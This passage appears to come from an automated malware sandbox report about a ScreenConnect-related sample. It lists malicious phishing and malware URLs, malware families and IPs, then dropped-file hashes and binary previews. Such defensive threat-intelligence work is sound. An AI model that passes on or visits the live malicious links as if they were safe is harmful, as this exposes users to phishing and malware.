	https://webconference.protected-forms.com/XZmlBeUlkbExkNHYxS3piZldoaGJqTzUrV3RZK1BkOGZVMlRsRGFZcnlYbnJ1K3h1VjJEMnY1d0lXNFNQVmswcXFCTmFqczEyaHMyc3lwSUpvNnFFYlJLemVwaEpGbjRXVnVRRk93ZUxYY0dwRmhsZ010WmVrNTNVR0N0YkdCeTRnTHZMb043aXdiVFo5a25TNjZkVThLaW8wem41RTU3MUl5b2dxWjNpdjFLNWdRSmdxL2ZocGVvdDVBPT0tLVNLdmlEU1hLTGZIRW9VQ0YtLWFoQVVsMnk3VVFLbzBPZHpycUt6OEE9PQ==?cid=2178924675	Get hash	malicious	KnowBe4	Browse	199.232.210.172
	http://googleads.g.doubleclick.net/aclk?sa=L&ai=CJF0hsbsNVNi_DIPR0AGqhIGYDPfOz9MFj-TFvsMB25uy0esBEAEg4_uTA1DMiaOOBWDN8N-A5ALIAQSpAgbEodTv6J0-qAMBmAQFqgSnAU_QL6NE73jlCJ7TFvA2kg2Ig3wrASDHwt7I6P2gJSz2wmCekvewEDUw1zPqYx0NADEmzairfw3ur1wkNI8P6teiwhlldXdj5OGBN4lmsCEDPv86I5o3eNVngnJfRiuDvxlWje20-VfTVoLEZHjLsyN8zQleVTsGbhHjd1BSHfxBMk8P6-QwvlL67TaFDfOyk-sIZEC0a7hK4DdrheQBo-5kNsgA7ijRoAYEgAfP_b4i&num=1&sig=AOD64_1QMErG-pSUGweRO5zdk0lMn9Ngwg&client=ca-pub-6219811747049371&adurl=http://nDmfN.toplogtrans.com.br%2Fcgi-bin%2F9224511553/9224511553/cGFydG5lcmhuZHVhbWVyQHB1cmVzdG9yYWdlLmNvbQ==	Get hash	malicious	Unknown	Browse	199.232.214.172
	Document.xla.xlsx	Get hash	malicious	Unknown	Browse	199.232.210.172
	EXT_Transaction Details for Martibs -462fd4a1151861ecbc00b016e69e7825 (18.7 KB).msg	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://www.trendytechinsight.com/sx	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://bonzibuddy.org/Bonzi.zip	Get hash	malicious	Unknown	Browse	199.232.214.172
fp2e7a.wpc.phicdn.net	https://virtual.urban-orthodontics.com	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://o000005496.photoshelter.com/	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://arcalo.ru.com/#cathy.sekula@steptoe-johnson.com	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	https://carrier.businessappdevs.com/Baa9N	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	https://webconference.protected-forms.com/XZmlBeUlkbExkNHYxS3piZldoaGJqTzUrV3RZK1BkOGZVMlRsRGFZcnlYbnJ1K3h1VjJEMnY1d0lXNFNQVmswcXFCTmFqczEyaHMyc3lwSUpvNnFFYlJLemVwaEpGbjRXVnVRRk93ZUxYY0dwRmhsZ010WmVrNTNVR0N0YkdCeTRnTHZMb043aXdiVFo5a25TNjZkVThLaW8wem41RTU3MUl5b2dxWjNpdjFLNWdRSmdxL2ZocGVvdDVBPT0tLVNLdmlEU1hLTGZIRW9VQ0YtLWFoQVVsMnk3VVFLbzBPZHpycUt6OEE9PQ==?cid=2178924675	Get hash	malicious	KnowBe4	Browse	192.229.221.95
	https://www.bing.com/ck/a?!&&p=5ceef533778c3decJmltdHM9MTcyMzQyMDgwMCZpZ3VpZD0zNjRmNjVlOC1lNTZjLTYxOWQtMTI1Ny03MTNlZTQyYTYwMTImaW5zaWQ9NTE0MA&ptn=3&ver=2&hsh=3&fclid=364f65e8-e56c-619d-1257-713ee42a6012&u=a1aHR0cHM6Ly9sZXhpbnZhcmlhbnQuY29tLw#aHR0cHM6Ly9wVGhOLmFpcnJjb2Z2YmMuY29tL1lSZVhqTi8=/#<EMAIL>	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://googleads.g.doubleclick.net/aclk?sa=L&ai=CJF0hsbsNVNi_DIPR0AGqhIGYDPfOz9MFj-TFvsMB25uy0esBEAEg4_uTA1DMiaOOBWDN8N-A5ALIAQSpAgbEodTv6J0-qAMBmAQFqgSnAU_QL6NE73jlCJ7TFvA2kg2Ig3wrASDHwt7I6P2gJSz2wmCekvewEDUw1zPqYx0NADEmzairfw3ur1wkNI8P6teiwhlldXdj5OGBN4lmsCEDPv86I5o3eNVngnJfRiuDvxlWje20-VfTVoLEZHjLsyN8zQleVTsGbhHjd1BSHfxBMk8P6-QwvlL67TaFDfOyk-sIZEC0a7hK4DdrheQBo-5kNsgA7ijRoAYEgAfP_b4i&num=1&sig=AOD64_1QMErG-pSUGweRO5zdk0lMn9Ngwg&client=ca-pub-6219811747049371&adurl=http://nDmfN.toplogtrans.com.br%2Fcgi-bin%2F9224511553/9224511553/cGFydG5lcmhuZHVhbWVyQHB1cmVzdG9yYWdlLmNvbQ==	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://www.trendytechinsight.com/sx	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://bonzibuddy.org/Bonzi.zip	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://mikkymax.com	Get hash	malicious	Unknown	Browse	192.229.221.95

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
EDGEtaGCIComGB	la.bot.m68k.elf	Get hash	malicious	Unknown	Browse	213.210.9.89
	la.bot.powerpc.elf	Get hash	malicious	Unknown	Browse	77.107.70.202
	fvIqrxcfuL.exe	Get hash	malicious	Quasar	Browse	89.213.56.109
	la.bot.mipsel.elf	Get hash	malicious	Unknown	Browse	89.213.146.12
	arm7.elf	Get hash	malicious	Unknown	Browse	77.107.120.22
	JnC2t6WhUf.elf	Get hash	malicious	Mirai	Browse	213.130.144.69
	mhmdm9Hb6i.elf	Get hash	malicious	Mirai	Browse	213.130.144.69
	https://t.ly/nFp5i	Get hash	malicious	Unknown	Browse	213.130.145.203
	x.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	89.213.177.177
	visabuilder.exe	Get hash	malicious	Python Stealer, Discord Token Stealer	Browse	213.130.145.42

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	https://zillow-online.com/realestate/one/drive/docs/	Get hash	malicious	HTMLPhisher	Browse	185.49.126.73
	Pmendon.ext_Reord_Adjustment.docx	Get hash	malicious	Captcha Phish	Browse	185.49.126.73
	Factura de proforma.exe	Get hash	malicious	AgentTesla	Browse	185.49.126.73
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	185.49.126.73
	https://uxfol.io/p/b02d8c67/029f480a	Get hash	malicious	Unknown	Browse	185.49.126.73
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.49.126.73
	https://bonzibuddy.org/Bonzi.zip	Get hash	malicious	Unknown	Browse	185.49.126.73
	https://wetransfer.com/downloads/dfae2da4024c0a427ba385707deb5ffa20240620022822/9659fc	Get hash	malicious	Unknown	Browse	185.49.126.73
	Company Profile_pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	185.49.126.73
	SUNNY (1).exe	Get hash	malicious	MassLogger RAT	Browse	185.49.126.73

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.ClientService.exe	Rechnung_10401.js	Get hash	malicious	ScreenConnect Tool	Browse
	Rechnung_Datum_November 24_6957.js	Get hash	malicious	ScreenConnect Tool	Browse
	file.exe	Get hash	malicious	ScreenConnect Tool	Browse
	file.exe	Get hash	malicious	ScreenConnect Tool	Browse
C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsBackstageShell.exe	Rechnung_10401.js	Get hash	malicious	ScreenConnect Tool	Browse
	Rechnung_Datum_November 24_6957.js	Get hash	malicious	ScreenConnect Tool	Browse
	file.exe	Get hash	malicious	ScreenConnect Tool	Browse
	file.exe	Get hash	malicious	ScreenConnect Tool	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.30738008913005
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrp:KooCEYhgYEL0In
MD5:	307F546B6A33AC171548A41E7AF6175D
SHA1:	149B3C2FB570AC19E99238FF74F6EAEF2F60ED11
SHA-256:	F1C28BB8263C1CFAD7B181AB9D70C80284846B856FBAC578183368423A19AF45
SHA-512:	2168245E861B1478151E78836BD70DBEA7A21F76464BBD91A9D901FF6B706FBE0FE3AAED8027AFB5D5C69779977058828BBC171EFE04B927A82A786D2FF0601E
Malicious:	false
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x62e4f6d9, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.4221509263502241
Encrypted:	false
SSDEEP:	1536:5SB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:5aza/vMUM2Uvz7DO
MD5:	4E33C0EF5652B7180A4C0CFEF3C8652F
SHA1:	222A7F60B10CBAEF4D2476325DCFB3F3FBAC1B3A
SHA-256:	4C9A20AE0DB1B96E584A4412D94EFF65282FD9F01436012E36B6A0CE905DE39A
SHA-512:	8CEA1733C84F326E2DECAC2731233FB65E214550E67F47511FCC55D4309540885B0ACFD418F7892F9AF36A243540C068E2E690EC094CD05A57C31D9EC0078717
Malicious:	false
Preview:	b...... .......A.......X\...;...{......................0.!..........{A.:....\|}.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{.....................................7:....\|....................5.:....\|}..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07680222831681127
Encrypted:	false
SSDEEP:	3:wmXEYeo6uZA+Cejjn13a/kLzalqllcVO/lnlZMxZNQl:wmUzjuaKj53qwzaleOewk
MD5:	D5FC361EF9B5DE4E3799554D5A31359A
SHA1:	273D6677E84D0F01189C39080FC208C805FAC2E1
SHA-256:	01E35810B9141EA5ED438D0EEE1A39307B34ED9F12CE9F74D039AE877E75FA14
SHA-512:	82FF1D64F16B12E7D5823058A84DF3CF19C8E5787BDD887133B0072E33BB09A5FA13E7C3FBEF0DF6DAA1FEC3F07F16D230A5B384F5F9D9CB5AA02E0D25B538C0
Malicious:	false
Preview:	:.......................................;...{..:....\|}......{A..............{A......{A..........{A]..................5.:....\|}.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Support.Client (_5a63c4432494455eb3628cc1cc7766c341e5_7de988b1_428b93ac-de12-495d-acb1-2501a9c756bd\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9203706383387072
Encrypted:	false
SSDEEP:	96:MTFqPsBq1SoEYRsdXhrGXyf8QXIDcQvc6QcEVcw3cE/PgRgZ+HbHg/Jg+OgBCXEx:WQ3xR80BU/4jq0ozuiFuZ24IO83
MD5:	73A4F7AC50906DD9D4A656178F82E59D
SHA1:	27418C327BC7CCE26507BFC02135269A8CF3913C
SHA-256:	F5ADAE46BC87DEF040049F841ABCB60870139DE097645E99EDAABAF92D0E2EE4
SHA-512:	E918FF3929F78A5BF1827983ACD91778570805F9765E4D6599C8D8A296333487014BD5C9B0DC1572B8BABD3C907B92DB116E4B168658561D6C19F30DCFEE2011
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.9.9.1.8.7.7.0.4.3.1.2.2.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.9.9.1.8.7.9.0.8.9.9.9.3.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.2.8.b.9.3.a.c.-.d.e.1.2.-.4.9.5.d.-.a.c.b.1.-.2.5.0.1.a.9.c.7.5.6.b.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.3.5.2.4.4.1.2.-.d.c.2.3.-.4.f.5.a.-.b.8.a.7.-.6.9.7.a.e.4.d.c.b.a.c.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.u.p.p.o.r.t...C.l.i.e.n.t. .(.1.)...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.d.8.-.0.0.0.1.-.0.0.1.4.-.d.8.2.1.-.b.c.f.a.e.f.3.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.1.8.2.0.5.6.4.5.7.e.9.7.c.1.a.1.b.7.f.d.5.e.0.b.6.5.d.a.6.3.e.0.0.0.0.f.f.f.f.!.0.0.0.0.2.2.f.7.0.4.d.2.9.9.c.0.1.6.0.0.3.8.9.6.5.a.d.4.1.d.6.a.4.8.6.e.5.c.1.2.5.f.5.5.!.S.u.p.p.o.r.t...C.l.i.e.n.t. .(.1.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3996.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Nov 13 17:17:58 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	76540
Entropy (8bit):	1.7859200075936994
Encrypted:	false
SSDEEP:	192:w9ikcpjX/+H7EOhI/E3aZk6Tt+tIG0x7zw5kstlzgmiYnjGH:eikMCbLhI/SV6TtoIG0xw5VDHnjG
MD5:	8BCA6EC30701E221E1AFC636C2DC4417
SHA1:	CF4035F23EF459D42279143DF8FE7635B6B69B75
SHA-256:	4B45654A8CD0E50BFA54E72E32220D96274AFD9B2455FC4AB9A7D3AF3A64834E
SHA-512:	95376049C61C5C73B5B1F98BC57B39C9809BC887582E4AF99ACF32D8FF8EAD0C5FE6358DC4C99E899DB435C92481DBB13168DFEE35725A8ED5F9174ADC3090F5
Malicious:	false
Preview:	MDMP..a..... .......F.4g....................................$....;..........T.......8...........T............!..\|........... ...........................................................................................eJ..............GenuineIntel............T...........C.4g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3F34.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8362
Entropy (8bit):	3.700996079844906
Encrypted:	false
SSDEEP:	192:R6l7wVeJie6n6Y9PSU9RQvgmfSt5prO89b5ysfJJTm:R6lXJ76n6YVSU9RQvgmfStD5xfJA
MD5:	80F6535EE198483163E4CE698E1D9552
SHA1:	3E12E771C28708222C934AF6735D405ED60BD9E1
SHA-256:	B20FE579EFA20FA734417043E7CADC09BFC183F78959850165CC64402104E266
SHA-512:	03828C9E5F3CF2EA29009A9E7FB5AE1568F6CC3D638B06FFB8A40316C6D3CCA623570BBB8E9C072E5B9EC90AEB9FFBBEE85D09B82C0AB66F470F2871977F6004
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.7.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3F64.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4633
Entropy (8bit):	4.487603106013009
Encrypted:	false
SSDEEP:	48:cvIwWl8zsyJg77aI9BuWpW8VYsYm8M4JELF5j+q8RyvfO3ZTd:uIjfAI7nP7VQJYjPvG3ZTd
MD5:	E991FCCD3C464A35413056998746A27D
SHA1:	28FC77D96F53382C57EC20EF277B64A9065F5BB6
SHA-256:	B9F85C83AE85100B7EB725DC169894F43E569E6D5867D7E15F860259E4D2F707
SHA-512:	8C148FBF23296C6AD4200AA94CD1E70918E0398557271BE8CF09D8183919899602D445357F65D1E3FA134E275CBB66525ECF119B4BA64DD1CDAF03482D3F016F
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="586580" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3FA1.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	79200
Entropy (8bit):	3.0323023950254426
Encrypted:	false
SSDEEP:	1536:WPAhVgQCIdw8B9S8Ij40ITQi0p1Eqpni4:WPAhVgQCIdw8B9S8Ij40ITQi0p1zpni4
MD5:	253FEA2CB92AA57C4EC9C4EE7031E56E
SHA1:	AF0DE0BADC055E84B4689151A2E629C2A007377E
SHA-256:	26ACAD78FD9CC878406EC2CAC7F845D9A6D0843A9C6740FE3F6E99EDC9527044
SHA-512:	2A98BB3F31492F2A3CD4EF970A2071B4CD416D359758BD5E7CB00BE7913ECDA5A10F5BDFE7DDC663E1F6D7F614EFE4E414667088F0342A35C5CE4F3715B0B56F
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4119.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6852368954104944
Encrypted:	false
SSDEEP:	96:TiZYWWBHSZYJY2WjUrHfYEZtytEix4MfLwusqarPnMN2uIKDR3:2ZDVOjerarPnMN25K13
MD5:	6578B6BD175D4B10A44B705963AF0981
SHA1:	B7D146FDF16EF1BAF40BD0A442EFEE74009ED17A
SHA-256:	D0C571BFF8A2089DD805A030E9E21C52FF5F558197C23C29661F7E77817C76FF
SHA-512:	00C1275256809BFF8E7AB02FC70AB42B2EDFF817068253D68262104124E7DDD19487CBF7DD3AF1BC31F4ED9CE6ACD3751AE125B6DCE79DE8D374677C5CB05D39
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	Certificate, Version=3
Category:	dropped
Size (bytes):	1716
Entropy (8bit):	7.596259519827648
Encrypted:	false
SSDEEP:	48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
MD5:	D91299E84355CD8D5A86795A0118B6E9
SHA1:	7B0F360B775F76C94A12CA48445AA2D2A875701C
SHA-256:	46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
SHA-512:	6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
Malicious:	false
Preview:	0...0............@.`.L.^.....0....H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...210429000000Z..360428235959Z0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA10.."0....H.............0........./B.(.x.].9Y...B.3..=..p..&0...h.\..4$..KO.xC........g.RO..W.......>Mp$d....}4}L.W.kC....;....GZ..L.. 